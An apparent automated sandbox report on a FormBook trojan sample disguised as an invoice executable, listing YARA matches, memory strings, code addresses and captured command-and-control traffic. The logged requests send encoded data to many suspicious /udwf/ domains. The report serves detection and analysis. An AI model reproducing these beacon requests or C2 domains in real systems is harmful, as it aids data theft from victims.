            Source: fontview.exe, 0000000C.00000002.3733416579.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: fontview.exe, 0000000C.00000002.3733416579.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: fontview.exe, 0000000C.00000002.3733416579.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: fontview.exe, 0000000C.00000002.3733416579.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: fontview.exe, 0000000C.00000003.1524162688.00000000075C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckk
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: fontview.exe, 0000000C.00000002.3736597685.00000000057AE000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000036FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=autokit.help
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000005AD2000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003A22000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=otternaut.live
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000006762000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000046B2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=westcoastmedia.marketing
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000548A000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000033DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000548A000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000033DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/domain/search-domains?query=bellcom.media
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/cloudhost/
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/jiaoyi/
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/domain/
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/mail/
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/webhosting/
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/ykj/view.asp?domain=633922.com
            Source: unknownHTTP traffic detected: POST /udwf/ HTTP/1.1Host: www.littlehappiez.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.littlehappiez.comReferer: http://www.littlehappiez.com/udwf/Content-Type: application/x-www-form-urlencodedContent-Length: 188Connection: closeCache-Control: no-cacheUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 47 30 59 78 64 32 51 3d 51 31 2f 6c 4d 2b 73 36 4f 59 33 6a 59 4b 42 2f 7a 71 71 61 61 42 49 56 69 78 47 63 51 57 4b 2f 47 6b 74 53 36 47 6e 43 69 2b 36 6c 77 76 74 6c 4a 71 4b 68 69 51 53 42 66 75 38 43 56 66 51 70 5a 45 49 31 53 75 31 6c 76 67 4c 70 51 42 74 33 30 4e 53 54 6e 72 72 41 6a 49 45 57 65 54 4b 75 63 50 32 63 6f 50 4d 64 6c 63 64 38 62 34 64 44 35 39 49 4c 34 6b 53 76 67 32 32 62 78 66 6e 4a 6a 59 45 36 56 32 4a 35 4e 66 66 61 33 62 35 33 71 4e 70 34 77 47 78 56 6a 58 4e 6b 6e 53 58 70 6c 4d 32 74 53 6f 52 39 73 2f 6c 4d 30 6a 78 41 67 67 3d 3d Data Ascii: G0Yxd2Q=Q1/lM+s6OY3jYKB/zqqaaBIVixGcQWK/GktS6GnCi+6lwvtlJqKhiQSBfu8CVfQpZEI1Su1lvgLpQBt30NSTnrrAjIEWeTKucP2coPMdlcd8b4dD59IL4kSvg22bxfnJjYE6V2J5Nffa3b53qNp4wGxVjXNknSXplM2tSoR9s/lM0jxAgg==
            Source: unknownDNS traffic detected: queries for: www.aifuturesummit.com
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=Kq0jCDSsi+gLhYagIFFza5XYEfPHq1wckJYs2pUOQJ4UOA08Cv/iplAOJSGKGG8twuAeLLQOU/XInoWNJu0WYoAEZtaSTts9sg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.aifuturesummit.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.littlehappiez.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=/fHzvDGB04J+q8b6XJE1xYe30bxweLJnilom5C96GpM+NoY5L9yFqNs9P5GPx0eLkQDxLFeKj8P05w7qGZ9X0/BmwspDAeolpA==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.bellcom.mediaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=P+fiFlpl7OLgwg5VHMgiIoMqSXbT5qRAvhgaNfc+psLdu/aEMeH5P0Irdy+G4rOOLUFD4nVEMYENkV+qciPdkHTOCgwyI1K3xg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.tutorwave.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=Z6xauRs66pTCKL+KzoyNUFozWOf0JDAANa247hz++z0llrRDJuB/QadTAD9i3swhMbuTmmXjFgWivfbmORZNoncA7F7QHJ1+AA==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.diabloseugene.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=pfKu+pVNsln4G6X0TIcdarC36EKmJps8u6QQpqwTd4K74JvWDy/kIYo7R3ufamPFtUrh+tiM68Q084b5gYWBh8dmFEHsBv37jg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.spark-tech-global.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=pZ4HfquroA03Gi5vNwF4ItLuSTGmPoiR8InmRf339X8P+rCcKVr0Urjn620xlb/Iiubkhpo0DqZ1bcej5UiuLGGOXANOCS2GgQ==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.otternaut.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.lxdedu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=4SYFJ+EdcnLhstYHjaYhZ0Xyh2Kg3P6YikQFgY7zApk8SZ1uWGpR3AVqWe4c3udQDum1CidNNnqrfkhOX4sOdDO6VZG27ug9uQ==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.xn--4gq62f8w1alm9b.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=JhD6cx1vDN8a5DTqTeGrmxpVAWwY3peLQFgmtHjEzCHBkXYzNr0CMjFSFUc9xNeYGx9uB9pdck/5lV77OkU8LgPfKC/e4IY5hQ==&vhQT=aV8PeNo0MvDl1 HTTP/1.1Host: www.autokit.helpAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&pp=dZa4 HTTP/1.1Host: www.lxdedu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=uaWfHshIK9gqRIt0eR4Tz5qfjwC0uWvEtBcNKoa2GFPJfFEePrXngeKx3tr3rBy7nKvOiQo6TdyP9ywL+/2JVArzIS+tipxZpg==&pp=dZa4 HTTP/1.1Host: www.iwhrkc.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=EgoyY5F9PuSC7IWgflDFG7vO7ChOxNSXUZQtmoKTqYmDoJiW0KocQ9ej5sZbxdFlzd/pkXvUfPTapOCXwmOa8U5eEphhhK4tvg==&pp=dZa4 HTTP/1.1Host: www.633922.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=ealZg/ITvpLJU7YFE/TF+8q+uExFybxcdjgzbBdGHgaAn5MnYWXQDBclabNRkiFFmFTfmTH8N/zDLP0J5EOM1vyD30GW5j90MQ==&pp=dZa4 HTTP/1.1Host: www.sorenad.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /udwf/?G0Yxd2Q=XDsu41kr/WE9JT9AScR/+1k0JlKiFIG701T/ujNzDh06TiWTrNXnD44RUNnX/KpbWGAw0lPsPrhbwlOTmOIr6R/DwJG4M7kG+w==&pp=dZa4 HTTP/1.1Host: www.westcoastmedia.marketingAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Invoice_&_SOA_ready_for_dispatch.exe
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_02E983E00_2_02E983E0
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_02E987080_2_02E98708
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_02E96FE00_2_02E96FE0
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_02E973020_2_02E97302
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_02E984810_2_02E98481
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_02E978050_2_02E97805
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_054E91000_2_054E9100
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_054E25500_2_054E2550
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_054E25600_2_054E2560
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_054E90F00_2_054E90F0
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_054E1BA00_2_054E1BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004028804_2_00402880
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004030804_2_00403080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041008B4_2_0041008B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004100934_2_00410093
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042A9434_2_0042A943
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040112A4_2_0040112A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004011304_2_00401130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004102B34_2_004102B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E3334_2_0040E333
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00401C404_2_00401C40
